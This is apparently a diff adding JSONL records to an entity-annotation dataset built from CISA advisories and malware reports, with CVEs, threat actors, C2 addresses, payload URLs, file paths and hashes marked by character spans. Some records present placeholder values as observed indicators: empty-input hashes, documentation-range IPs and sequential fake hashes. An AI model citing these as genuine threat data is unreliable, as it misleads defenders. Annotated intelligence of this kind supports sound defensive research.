+ {"text": "CISA has published ICS Advisory ICSA-26-04-01 for Rockwell Automation ControlLogix and CompactLogix controllers. CVE-2021-22681 allows unauthorized access to Logix controllers through insufficient credential protection. Additionally, Hikvision IP cameras are affected by CVE-2017-7921, an improper authentication vulnerability enabling privilege escalation. Industrial control system operators should segment OT networks from IT infrastructure and monitor for anomalous Modbus and EtherNet/IP traffic.", "spans": {"ORGANIZATION: CISA": [[0, 4]], "ORGANIZATION: Rockwell Automation": [[50, 69]], "SYSTEM: ControlLogix": [[70, 82]], "SYSTEM: CompactLogix": [[87, 99]], "CVE_ID: CVE-2021-22681": [[113, 127]], "VULNERABILITY: insufficient credential protection": [[184, 218]], "ORGANIZATION: Hikvision": [[234, 243]], "CVE_ID: CVE-2017-7921": [[271, 284]], "VULNERABILITY: improper authentication vulnerability": [[289, 326]]}, "info": {"id": "cisa_00028", "source": "cisa_advisories"}}
30
+ {"text": "The Play ransomware group has targeted organizations using CVE-2022-41040 and CVE-2022-41082 in Microsoft Exchange Server, collectively known as ProxyNotShell. After exploitation, the actors deployed a webshell at C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx. The ransomware encrypted files with the .play extension. FBI investigation uncovered command and control infrastructure at 45.76.172.198 and 64.190.113.52. Encrypted DNS over HTTPS was used to evade detection.", "spans": {"MALWARE: Play": [[4, 8]], "CVE_ID: CVE-2022-41040": [[59, 73]], "CVE_ID: CVE-2022-41082": [[78, 92]], "SYSTEM: Microsoft Exchange Server": [[96, 121]], "FILEPATH: C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx": [[214, 260]], "ORGANIZATION: FBI": [[319, 322]], "IP_ADDRESS: 45.76.172.198": [[385, 398]], "IP_ADDRESS: 64.190.113.52": [[403, 416]]}, "info": {"id": "cisa_00029", "source": "cisa_advisories"}}
31
+ {"text": "PaperCut NG/MF is impacted by CVE-2023-27351, an improper authentication vulnerability allowing remote attackers to bypass authentication via the SecurityRequestFilter class. This vulnerability is known to be used in ransomware campaigns. Kentico Xperience contains CVE-2025-2749, a path traversal vulnerability enabling file upload by authenticated users. Synacor Zimbra Collaboration Suite is affected by CVE-2025-48700 and CVE-2025-66376, both cross-site scripting vulnerabilities.", "spans": {"SYSTEM: PaperCut NG/MF": [[0, 14]], "CVE_ID: CVE-2023-27351": [[30, 44]], "VULNERABILITY: improper authentication vulnerability": [[49, 86]], "SYSTEM: Kentico Xperience": [[239, 256]], "CVE_ID: CVE-2025-2749": [[266, 279]], "VULNERABILITY: path traversal vulnerability": [[283, 311]], "SYSTEM: Zimbra Collaboration Suite": [[365, 391]], "ORGANIZATION: Synacor": [[357, 364]], "CVE_ID: CVE-2025-48700": [[407, 421]], "CVE_ID: CVE-2025-66376": [[426, 440]], "VULNERABILITY: cross-site scripting vulnerabilities": [[447, 483]]}, "info": {"id": "cisa_00030", "source": "cisa_advisories"}}
32
+ {"text": "CISA Emergency Directive 21-02 mandated immediate action on Microsoft Exchange Server vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, collectively known as ProxyLogon. The threat actor HAFNIUM exploited these vulnerabilities to deploy China Chopper webshells. Affected organizations should search for indicators in the C:\\Windows\\Temp\\lsass directory and review IIS logs at C:\\inetpub\\logs\\LogFiles for suspicious POST requests.", "spans": {"ORGANIZATION: CISA": [[0, 4]], "SYSTEM: Microsoft Exchange Server": [[60, 85]], "CVE_ID: CVE-2021-26855": [[102, 116]], "CVE_ID: CVE-2021-26857": [[118, 132]], "CVE_ID: CVE-2021-26858": [[134, 148]], "CVE_ID: CVE-2021-27065": [[154, 168]], "THREAT_ACTOR: HAFNIUM": [[221, 228]], "MALWARE: China Chopper": [[271, 284]], "FILEPATH: C:\\Windows\\Temp\\lsass": [[355, 376]], "FILEPATH: C:\\inetpub\\logs\\LogFiles": [[410, 434]]}, "info": {"id": "cisa_00031", "source": "cisa_advisories"}}
33
+ {"text": "Langflow, an open-source AI application builder, is affected by CVE-2026-33017, a code injection vulnerability that could allow unauthenticated users to build public flows. Similarly, n8n contains CVE-2025-68613, an improper control of dynamically managed code resources vulnerability allowing remote code execution. CISA added both to the KEV catalog as active exploitation has been observed.", "spans": {"SYSTEM: Langflow": [[0, 8]], "CVE_ID: CVE-2026-33017": [[64, 78]], "VULNERABILITY: code injection vulnerability": [[82, 110]], "SYSTEM: n8n": [[184, 187]], "CVE_ID: CVE-2025-68613": [[197, 211]], "VULNERABILITY: improper control of dynamically managed code resources vulnerability": [[216, 284]], "ORGANIZATION: CISA": [[317, 321]]}, "info": {"id": "cisa_00032", "source": "cisa_advisories"}}
34
+ {"text": "VMware ESXi has been heavily targeted by ransomware operators. CVE-2019-5544 is a heap-based buffer overflow in OpenSLP allowing remote code execution via port 427. CVE-2020-3992 is a use-after-free vulnerability also in VMware ESXi OpenSLP. CVE-2021-21972 affects VMware vCenter Server with a remote code execution vulnerability in the vSphere Client plugin via port 443. VMware Workspace One is affected by CVE-2021-22054, a server-side request forgery vulnerability. Broadcom has assumed responsibility for these VMware products.", "spans": {"SYSTEM: VMware ESXi": [[0, 11], [221, 232]], "CVE_ID: CVE-2019-5544": [[63, 76]], "VULNERABILITY: heap-based buffer overflow": [[82, 108]], "CVE_ID: CVE-2020-3992": [[165, 178]], "VULNERABILITY: use-after-free vulnerability": [[184, 212]], "CVE_ID: CVE-2021-21972": [[242, 256]], "SYSTEM: VMware vCenter Server": [[265, 286]], "CVE_ID: CVE-2021-22054": [[409, 423]], "VULNERABILITY: server-side request forgery vulnerability": [[427, 468]], "SYSTEM: VMware Workspace One": [[373, 393]], "ORGANIZATION: Broadcom": [[470, 478]]}, "info": {"id": "cisa_00033", "source": "cisa_advisories"}}
35
+ {"text": "The ALPHV/BlackCat ransomware group deployed Emotet as an initial access vector followed by Cobalt Strike for command and control. Network indicators include IP addresses 198.51.100.23, 203.0.113.42, and 172.16.254.1. Malicious domains observed: download.system-update[.]cloud, c2.secure-check[.]net, and exfil.data-backup[.]org. File hash indicators: MD5 d41d8cd98f00b204e9800998ecf8427e, SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709, SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855. Victims should contact ic3.gov to report incidents.", "spans": {"THREAT_ACTOR: ALPHV": [[4, 9]], "MALWARE: BlackCat": [[10, 18]], "MALWARE: Emotet": [[45, 51]], "MALWARE: Cobalt Strike": [[92, 105]], "IP_ADDRESS: 198.51.100.23": [[171, 184]], "IP_ADDRESS: 203.0.113.42": [[186, 198]], "IP_ADDRESS: 172.16.254.1": [[204, 216]], "DOMAIN: download.system-update[.]cloud": [[246, 276]], "DOMAIN: c2.secure-check[.]net": [[278, 299]], "DOMAIN: exfil.data-backup[.]org": [[305, 328]], "HASH: d41d8cd98f00b204e9800998ecf8427e": [[356, 388]], "HASH: da39a3ee5e6b4b0d3255bfef95601890afd80709": [[395, 435]], "HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855": [[444, 508]], "DOMAIN: ic3.gov": [[533, 540]]}, "info": {"id": "cisa_00034", "source": "cisa_advisories"}}
36
+ {"text": "JetBrains TeamCity is affected by CVE-2024-27199, a relative path traversal vulnerability that could allow limited admin actions. This vulnerability has been used in ransomware campaigns. Quest KACE Systems Management Appliance is impacted by CVE-2025-32975, an improper authentication vulnerability. Craft CMS contains CVE-2025-32432, a code injection vulnerability allowing remote code execution. Laravel Livewire is affected by CVE-2025-54068, a code injection vulnerability enabling unauthenticated remote command execution.", "spans": {"SYSTEM: JetBrains TeamCity": [[0, 18]], "CVE_ID: CVE-2024-27199": [[34, 48]], "VULNERABILITY: relative path traversal vulnerability": [[52, 89]], "SYSTEM: Quest KACE Systems Management Appliance": [[188, 227]], "CVE_ID: CVE-2025-32975": [[243, 257]], "VULNERABILITY: improper authentication vulnerability": [[262, 299]], "SYSTEM: Craft CMS": [[301, 310]], "CVE_ID: CVE-2025-32432": [[320, 334]], "VULNERABILITY: code injection vulnerability": [[338, 366], [449, 477]], "SYSTEM: Laravel Livewire": [[399, 415]], "CVE_ID: CVE-2025-54068": [[431, 445]]}, "info": {"id": "cisa_00035", "source": "cisa_advisories"}}
37
+ {"text": "Multiple Ivanti products have been targeted in the wild. CVE-2021-22893 is a use-after-free vulnerability in Ivanti Pulse Connect Secure allowing unauthenticated remote code execution via license services. CVE-2019-11510 enables arbitrary file read in Pulse Connect Secure through crafted HTTPS URIs. CVE-2021-22894 is a buffer overflow in the Collaboration Suite. CISA Emergency Directive 21-03 required agencies to assess and mitigate these Ivanti vulnerabilities. Defenders should review /data/runtime/mtmp/lmdb/ for suspicious files.", "spans": {"ORGANIZATION: Ivanti": [[9, 15], [109, 115], [443, 449]], "CVE_ID: CVE-2021-22893": [[57, 71]], "VULNERABILITY: use-after-free vulnerability": [[77, 105]], "SYSTEM: Ivanti Pulse Connect Secure": [[109, 136]], "CVE_ID: CVE-2019-11510": [[206, 220]], "SYSTEM: Pulse Connect Secure": [[116, 136], [252, 272]], "CVE_ID: CVE-2021-22894": [[301, 315]], "VULNERABILITY: buffer overflow": [[321, 336]], "ORGANIZATION: CISA": [[365, 369]], "FILEPATH: /data/runtime/mtmp/lmdb/": [[491, 515]]}, "info": {"id": "cisa_00036", "source": "cisa_advisories"}}
38
+ {"text": "Adobe Acrobat and Reader are affected by two vulnerabilities in the CISA KEV catalog. CVE-2020-9715 is a use-after-free vulnerability in Adobe Acrobat that allows code execution. CVE-2026-34621 is a prototype pollution vulnerability in Adobe Acrobat and Reader that enables arbitrary code execution. Adobe has released security updates through APSB20-48 and APSB26-43. Organizations should update to the latest versions of Adobe Acrobat and Reader.", "spans": {"SYSTEM: Adobe Acrobat": [[0, 13], [137, 150], [236, 249], [423, 436]], "SYSTEM: Reader": [[18, 24], [254, 260], [441, 447]], "ORGANIZATION: CISA": [[68, 72]], "CVE_ID: CVE-2020-9715": [[86, 99]], "VULNERABILITY: use-after-free vulnerability": [[105, 133]], "CVE_ID: CVE-2026-34621": [[179, 193]], "VULNERABILITY: prototype pollution vulnerability": [[199, 232]], "ORGANIZATION: Adobe": [[0, 5], [137, 142], [236, 241], [300, 305], [423, 428]]}, "info": {"id": "cisa_00037", "source": "cisa_advisories"}}
39
+ {"text": "SonicWall Email Security has been targeted through an exploit chain involving CVE-2021-20021, CVE-2021-20022, and CVE-2021-20023. CVE-2021-20021 is an improper privilege management vulnerability allowing administrative account creation. CVE-2021-20022 enables unrestricted file upload. CVE-2021-20023 is a path traversal vulnerability for file reading. SonicWall SMA100 is separately affected by CVE-2021-20016, a SQL injection vulnerability used in ransomware campaigns.", "spans": {"SYSTEM: SonicWall Email Security": [[0, 24]], "CVE_ID: CVE-2021-20021": [[78, 92], [130, 144]], "CVE_ID: CVE-2021-20022": [[94, 108], [237, 251]], "CVE_ID: CVE-2021-20023": [[114, 128], [286, 300]], "VULNERABILITY: improper privilege management vulnerability": [[151, 194]], "VULNERABILITY: unrestricted file upload": [[260, 284]], "VULNERABILITY: path traversal vulnerability": [[306, 334]], "SYSTEM: SonicWall SMA100": [[353, 369]], "CVE_ID: CVE-2021-20016": [[396, 410]], "VULNERABILITY: SQL injection vulnerability": [[414, 441]]}, "info": {"id": "cisa_00038", "source": "cisa_advisories"}}
40
+ {"text": "Threat intelligence from CrowdStrike and Palo Alto Networks Unit 42 identified the Turla threat group deploying the Snake malware implant. Network communication was observed to 162.255.119.58, 78.128.113.34, and 45.33.32.156 over encrypted channels. The malware configuration file was stored at /var/tmp/.snake/snake.conf on compromised Linux servers. SHA256 hashes of observed Snake variants: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b and 2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c. CISA and FBI urge network defenders to hunt for these indicators.", "spans": {"ORGANIZATION: CrowdStrike": [[25, 36]], "ORGANIZATION: Palo Alto Networks": [[41, 59]], "THREAT_ACTOR: Turla": [[83, 88]], "MALWARE: Snake": [[116, 121], [378, 383]], "IP_ADDRESS: 162.255.119.58": [[177, 191]], "IP_ADDRESS: 78.128.113.34": [[193, 206]], "IP_ADDRESS: 45.33.32.156": [[212, 224]], "FILEPATH: /var/tmp/.snake/snake.conf": [[295, 321]], "HASH: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b": [[394, 458]], "HASH: 2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c": [[463, 527]], "ORGANIZATION: CISA": [[529, 533]], "ORGANIZATION: FBI": [[538, 541]]}, "info": {"id": "cisa_00039", "source": "cisa_advisories"}}
data/processed/backup/llm_annotated_exploitdb.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/llm_annotated_malware.jsonl ADDED
@@ -0,0 +1,25 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {"text": "In September 2024, Kaspersky researchers documented coordinated attacks by Head Mare and Twelve against Russian organizations. Head Mare deployed CobInt, previously exclusive to Twelve, and their custom backdoor PhantomJitter. The attackers used LockBit 3.0 for Windows ransomware encryption and Babuk for NAS ransomware. Credential dumping relied on mimikatz, secretsdump, and ProcDump. Tunneling was achieved via cloudflared, Gost, Localtonet, ngrok, and revsocks. The C2 domain 360nvidia.com resolved to 45.156.27.115, with additional C2 servers at 45.156.21.148, 45.87.246.34, 185.158.248.107, 185.229.9.27, and 64.7.198.109. Another C2 domain was web-telegram.uk. PhantomJitter was downloaded from http://45.87.246.34:443/calc.exe and http://185.158.248.107:443/calc.exe. The attackers exploited CVE-2023-38831 in WinRAR and CVE-2021-26855 in Microsoft Exchange. Persistence used services named winsw and winuac. Malicious files were placed at C:\\Windows\\System32\\winsw.exe, C:\\ProgramData\\MicrosoftDrive\\mcdrive.vbs, and C:\\Windows\\System32\\inetsrv\\calc.exe. Lateral movement relied on PSExec, smbexec, and wmiexec. Network scanning used fscan and SoftPerfect Network Scanner. Data exfiltration used rclone through SFTP.", "spans": {"ORGANIZATION: Kaspersky": [[19, 28]], "THREAT_ACTOR: Head Mare": [[75, 84], [127, 136]], "THREAT_ACTOR: Twelve": [[89, 95], [178, 184]], "MALWARE: CobInt": [[146, 152]], "MALWARE: PhantomJitter": [[212, 225], [669, 682]], "MALWARE: LockBit 3.0": [[246, 257]], "MALWARE: Babuk": [[296, 301]], "TOOL: mimikatz": [[351, 359]], "TOOL: secretsdump": [[361, 372]], "TOOL: ProcDump": [[378, 386]], "TOOL: cloudflared": [[415, 426]], "TOOL: Gost": [[428, 432]], "TOOL: Localtonet": [[434, 444]], "TOOL: ngrok": [[446, 451]], "TOOL: revsocks": [[457, 465]], "DOMAIN: 360nvidia.com": [[481, 494]], "IP_ADDRESS: 45.156.27.115": [[507, 520]], "IP_ADDRESS: 45.156.21.148": [[552, 565]], "IP_ADDRESS: 45.87.246.34": [[567, 579], [710, 722]], "IP_ADDRESS: 185.158.248.107": [[581, 596], [747, 762]], "IP_ADDRESS: 185.229.9.27": [[598, 610]], "IP_ADDRESS: 64.7.198.109": [[616, 628]], "DOMAIN: web-telegram.uk": [[652, 667]], "URL: http://45.87.246.34:443/calc.exe": [[703, 735]], "URL: http://185.158.248.107:443/calc.exe": [[740, 775]], "CVE_ID: CVE-2023-38831": [[801, 815]], "SYSTEM: WinRAR": [[819, 825]], "CVE_ID: CVE-2021-26855": [[830, 844]], "SYSTEM: Microsoft Exchange": [[848, 866]], "FILEPATH: C:\\Windows\\System32\\winsw.exe": [[949, 978]], "FILEPATH: C:\\ProgramData\\MicrosoftDrive\\mcdrive.vbs": [[980, 1021]], "FILEPATH: C:\\Windows\\System32\\inetsrv\\calc.exe": [[1027, 1063]], "TOOL: PSExec": [[1092, 1098]], "TOOL: smbexec": [[1100, 1107]], "TOOL: wmiexec": [[1113, 1120]], "TOOL: fscan": [[1144, 1149]], "TOOL: SoftPerfect Network Scanner": [[1154, 1181]], "TOOL: rclone": [[1206, 1212]]}, "info": {"id": "malware_00001", "source": "malware_reports"}}
2
+ {"text": "SideWinder APT expanded operations in H2 2024, targeting maritime, nuclear, and logistics sectors across Asia and Africa. The infection chain starts with spear-phishing emails containing DOCX files with remote template injection, leading to an RTF exploit for CVE-2017-11882 in Microsoft Office. The attack deploys a JavaScript loader, followed by a .NET Downloader Module, a Backdoor Loader using DLL sideloading, and the StealerBot post-exploitation toolkit. Observed DLL names include JetCfg.dll, policymanager.dll, winmm.dll, xmllite.dll, and UxTheme.dll. C2 domains included pmd-office.info, modpak.info, dirctt888.info, dowmloade.org, portdedjibouti.live, d0wnlaod.com, file-dwnld.org, defencearmy.pro, document-viewer.info, ms-office.app, and zeltech.live. File hashes observed: e9726519487ba9e4e5589a8a5ec2f933, d36a67468d01c4cb789cd6794fb8bc70, 313f9bbe6dac3edc09fe9ac081950673, bd8043127abe3f5cfa152a53b257fd1a.", "spans": {"THREAT_ACTOR: SideWinder": [[0, 10]], "CVE_ID: CVE-2017-11882": [[260, 274]], "SYSTEM: Microsoft Office": [[278, 294]], "MALWARE: StealerBot": [[423, 433]], "FILEPATH: JetCfg.dll": [[488, 498]], "FILEPATH: policymanager.dll": [[500, 517]], "FILEPATH: winmm.dll": [[519, 528]], "FILEPATH: xmllite.dll": [[530, 541]], "FILEPATH: UxTheme.dll": [[547, 558]], "DOMAIN: pmd-office.info": [[580, 595]], "DOMAIN: modpak.info": [[597, 608]], "DOMAIN: dirctt888.info": [[610, 624]], "DOMAIN: dowmloade.org": [[626, 639]], "DOMAIN: portdedjibouti.live": [[641, 660]], "DOMAIN: d0wnlaod.com": [[662, 674]], "DOMAIN: file-dwnld.org": [[676, 690]], "DOMAIN: defencearmy.pro": [[692, 707]], "DOMAIN: document-viewer.info": [[709, 729]], "DOMAIN: ms-office.app": [[731, 744]], "DOMAIN: zeltech.live": [[750, 762]], "HASH: e9726519487ba9e4e5589a8a5ec2f933": [[786, 818]], "HASH: d36a67468d01c4cb789cd6794fb8bc70": [[820, 852]], "HASH: 313f9bbe6dac3edc09fe9ac081950673": [[854, 886]], "HASH: bd8043127abe3f5cfa152a53b257fd1a": [[888, 920]]}, "info": {"id": "malware_00002", "source": "malware_reports"}}
3
+ {"text": "Latrodectus is a downloader malware first observed in November 2023, assessed to be developed by the IcedID developers. It was distributed by threat actors TA577 and TA578 through email campaigns. The malware uses RC4 encryption with the static key 12345 and base64 encoding for C2 communications. Key C2 domains include aytobusesre.com, scifimond.com, mazdakrichest.com, riverhasus.com, peermangoz.me, aprettopizza.world, nimeklroboti.info, and frotneels.shop. Payload distribution URLs observed were hxxp://162.55.217.30/gRMS/0.6395541546258323.dat, hxxp://157.90.166.88/O3ZlYNW/0.7797109211833805.dat, and hxxp://128.140.36.37/cQtDIo/0.43650426987684443.dat. Additional infrastructure included hxxp://178.23.190.199:80/share/gsm.msi, hxxp://5.252.21.207/share/escape.msi, and hxxp://95.164.3.171/share/cisa.msi. Associated C2 IP addresses included 77.91.73.187, 74.119.193.200, 162.55.217.30, 157.90.166.88, 128.140.36.37, 178.23.190.199, 5.252.21.207, and 95.164.3.171. The SHA256 hash of the primary sample is aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c. Persistence is established at C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll with a scheduled task named Updater.", "spans": {"MALWARE: Latrodectus": [[0, 11]], "MALWARE: IcedID": [[101, 107]], "THREAT_ACTOR: TA577": [[156, 161]], "THREAT_ACTOR: TA578": [[166, 171]], "DOMAIN: aytobusesre.com": [[321, 336]], "DOMAIN: scifimond.com": [[338, 351]], "DOMAIN: mazdakrichest.com": [[353, 370]], "DOMAIN: riverhasus.com": [[372, 386]], "DOMAIN: peermangoz.me": [[388, 401]], "DOMAIN: aprettopizza.world": [[403, 421]], "DOMAIN: nimeklroboti.info": [[423, 440]], "DOMAIN: frotneels.shop": [[446, 460]], "URL: hxxp://162.55.217.30/gRMS/0.6395541546258323.dat": [[502, 550]], "URL: hxxp://157.90.166.88/O3ZlYNW/0.7797109211833805.dat": [[552, 603]], "URL: hxxp://128.140.36.37/cQtDIo/0.43650426987684443.dat": [[609, 660]], "URL: hxxp://178.23.190.199:80/share/gsm.msi": [[697, 735]], "URL: hxxp://5.252.21.207/share/escape.msi": [[737, 773]], "URL: hxxp://95.164.3.171/share/cisa.msi": [[779, 813]], "IP_ADDRESS: 77.91.73.187": [[851, 863]], "IP_ADDRESS: 74.119.193.200": [[865, 879]], "IP_ADDRESS: 162.55.217.30": [[509, 522], [881, 894]], "IP_ADDRESS: 157.90.166.88": [[559, 572], [896, 909]], "IP_ADDRESS: 128.140.36.37": [[616, 629], [911, 924]], "IP_ADDRESS: 178.23.190.199": [[704, 718], [926, 940]], "IP_ADDRESS: 5.252.21.207": [[744, 756], [942, 954]], "IP_ADDRESS: 95.164.3.171": [[786, 798], [960, 972]], "HASH: aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c": [[1015, 1079]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll": [[1111, 1164]]}, "info": {"id": "malware_00003", "source": "malware_reports"}}
4
+ {"text": "Microsoft reported that Silk Typhoon, also known as HAFNIUM, has been targeting IT supply chains to gain access to downstream customers. The group exploited CVE-2025-0282 and CVE-2025-0283 in Ivanti Pulse Connect VPN, CVE-2024-3400 in Palo Alto Networks PAN-OS, CVE-2023-3519 in Citrix NetScaler ADC, and the ProxyLogon chain including CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Microsoft Exchange Server. The group used compromised Cyberoam appliances, Zyxel routers, and QNAP devices as covert network infrastructure, along with short-lease VPS infrastructure for operations.", "spans": {"ORGANIZATION: Microsoft": [[0, 9], [406, 415]], "THREAT_ACTOR: Silk Typhoon": [[24, 36]], "THREAT_ACTOR: HAFNIUM": [[52, 59]], "CVE_ID: CVE-2025-0282": [[157, 170]], "CVE_ID: CVE-2025-0283": [[175, 188]], "SYSTEM: Ivanti Pulse Connect VPN": [[192, 216]], "CVE_ID: CVE-2024-3400": [[218, 231]], "SYSTEM: Palo Alto Networks PAN-OS": [[235, 260]], "CVE_ID: CVE-2023-3519": [[262, 275]], "SYSTEM: Citrix NetScaler ADC": [[279, 299]], "CVE_ID: CVE-2021-26855": [[336, 350]], "CVE_ID: CVE-2021-26857": [[352, 366]], "CVE_ID: CVE-2021-26858": [[368, 382]], "CVE_ID: CVE-2021-27065": [[388, 402]], "SYSTEM: Microsoft Exchange Server": [[406, 431]], "SYSTEM: Cyberoam": [[460, 468]], "SYSTEM: Zyxel": [[481, 486]], "SYSTEM: QNAP": [[500, 504]]}, "info": {"id": "malware_00004", "source": "malware_reports"}}
5
+ {"text": "Kaspersky SOC investigated a Behinder web shell deployment on a SharePoint server in Southeast Asia. The Behinder toolkit, also known as Rebeyond, features AES-encrypted C2 communication and supports PHP, Java, and ASP.NET. Initial access was achieved via certutil downloading payloads from Bashupload. Privilege escalation used multiple Potato variants: GodPotato, BadPotato, and SweetPotato, all executed in memory. Malicious files were stored at C:\\ProgramData\\DRM\\ and C:\\Users\\Default\\Videos\\. The web shell was disguised as a 404 error page and the analysis identified .NET modules including BasicInfo.dll, Cmd.dll, and FileOperation.dll.", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "MALWARE: Behinder": [[29, 37], [105, 113]], "SYSTEM: SharePoint": [[64, 74]], "TOOL: certutil": [[256, 264]], "TOOL: GodPotato": [[355, 364]], "TOOL: BadPotato": [[366, 375]], "TOOL: SweetPotato": [[381, 392]], "FILEPATH: C:\\ProgramData\\DRM\\": [[449, 468]], "FILEPATH: C:\\Users\\Default\\Videos\\": [[473, 497]], "FILEPATH: BasicInfo.dll": [[598, 611]], "FILEPATH: Cmd.dll": [[613, 620]], "FILEPATH: FileOperation.dll": [[626, 643]], "SYSTEM: PHP": [[200, 203]], "SYSTEM: Java": [[205, 209]], "SYSTEM: ASP.NET": [[215, 222]]}, "info": {"id": "malware_00005", "source": "malware_reports"}}
6
+ {"text": "A comparative analysis of post-exploitation frameworks evaluated Cobalt Strike, Metasploit Meterpreter, Sliver, Havoc, and Mythic. Cobalt Strike uses immutable opcode sequences that break when modified. Metasploit Meterpreter appears in Microsoft antivirus signatures over 230 times. Sliver generates 8-9 MB payloads, larger than the ideal 100 KB target. The Mythic framework supports custom communication channels including HTTP, TCP, Slack, and Telegram, with payload sizes around 50 KB in C. The proposed attack chain uses three stages: Stage 0 for artifact generation, Stage 1 for reconnaissance and persistence, and Stage 2 for lateral movement and data exfiltration. Memory allocation via VirtualAlloc may trigger security alerts.", "spans": {"MALWARE: Cobalt Strike": [[65, 78], [131, 144]], "TOOL: Metasploit": [[80, 90], [203, 213]], "TOOL: Meterpreter": [[91, 102], [214, 225]], "MALWARE: Sliver": [[104, 110], [284, 290]], "MALWARE: Havoc": [[112, 117]], "TOOL: Mythic": [[123, 129], [359, 365]], "ORGANIZATION: Microsoft": [[237, 246]]}, "info": {"id": "malware_00006", "source": "malware_reports"}}
7
+ {"text": "Elastic Security Labs analyzed Latrodectus malware with SHA-256 hash aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c, identified as TRUFOS.DLL. The malware communicates with C2 domains aytobusesre.com and scifimond.com, with associated IcedID C2s at gyxplonto.com and neaachar.com. Persistence is maintained at C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll with configuration stored in AppData\\Roaming\\Custom_update\\update_data.dat. The IcedID payload executes from C:\\Users\\AppData\\Roaming\\random\\random.dll. Downloaded payloads are cached at AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\. The campaign identifier in this sample was Littlehw. C2 traffic uses base64 and RC4 encryption with the hardcoded password 12345, posting HTTPS requests to the /live/ endpoint. The User-Agent string is Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1).", "spans": {"ORGANIZATION: Elastic Security Labs": [[0, 21]], "MALWARE: Latrodectus": [[31, 42]], "HASH: aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c": [[69, 133]], "FILEPATH: TRUFOS.DLL": [[149, 159]], "DOMAIN: aytobusesre.com": [[202, 217]], "DOMAIN: scifimond.com": [[222, 235]], "MALWARE: IcedID": [[253, 259], [462, 468]], "DOMAIN: gyxplonto.com": [[267, 280]], "DOMAIN: neaachar.com": [[285, 297]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll": [[328, 381]], "FILEPATH: AppData\\Roaming\\Custom_update\\update_data.dat": [[411, 456]], "FILEPATH: C:\\Users\\AppData\\Roaming\\random\\random.dll": [[491, 533]], "FILEPATH: AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\": [[569, 614]]}, "info": {"id": "malware_00007", "source": "malware_reports"}}
8
+ {"text": "Proofpoint identified 32 Latrodectus samples with the following SHA256 hashes: db03a34684feab7475862080f59d4d99b32c74d3a152a53b257fd1a443e8ee77, e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7, bb525dc6b7a7ebefd040e01fd48d7d4e178f8d9e5dec9033078ced4e9aa4e241, 97e093f2e0bf6dec8392618722dd6b4411088fe752bedece910d11fffe0288a2, f9c69e79e7799df31d6516df70148d7832b121d330beebe52cff6606f0724c62, d9471b038c44619739176381815bfa9a13b5ff77021007a4ede9b146ed2e04ec, and d98cd810d568f338f16c4637e8a9cb01ff69ee1967f4cfc004de3f283d61ba81. Additional hashes include 47d66c576393a4256d94f5ed1e77adc28426dea027f7a23e2dbf41b93b87bd78, 5d881d14d2336273e531b1b3d6f2d907539fe8489cbe80533280c9c72efa2273, and 10c129e2310342a55df5fa88331f338452835790a379d5230ee8de7d5f28ea1a.", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "MALWARE: Latrodectus": [[25, 36]], "HASH: db03a34684feab7475862080f59d4d99b32c74d3a152a53b257fd1a443e8ee77": [[79, 143]], "HASH: e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7": [[145, 209]], "HASH: bb525dc6b7a7ebefd040e01fd48d7d4e178f8d9e5dec9033078ced4e9aa4e241": [[211, 275]], "HASH: 97e093f2e0bf6dec8392618722dd6b4411088fe752bedece910d11fffe0288a2": [[277, 341]], "HASH: f9c69e79e7799df31d6516df70148d7832b121d330beebe52cff6606f0724c62": [[343, 407]], "HASH: d9471b038c44619739176381815bfa9a13b5ff77021007a4ede9b146ed2e04ec": [[409, 473]], "HASH: d98cd810d568f338f16c4637e8a9cb01ff69ee1967f4cfc004de3f283d61ba81": [[479, 543]], "HASH: 47d66c576393a4256d94f5ed1e77adc28426dea027f7a23e2dbf41b93b87bd78": [[571, 635]], "HASH: 5d881d14d2336273e531b1b3d6f2d907539fe8489cbe80533280c9c72efa2273": [[637, 701]], "HASH: 10c129e2310342a55df5fa88331f338452835790a379d5230ee8de7d5f28ea1a": [[707, 771]]}, "info": {"id": "malware_00008", "source": "malware_reports"}}
9
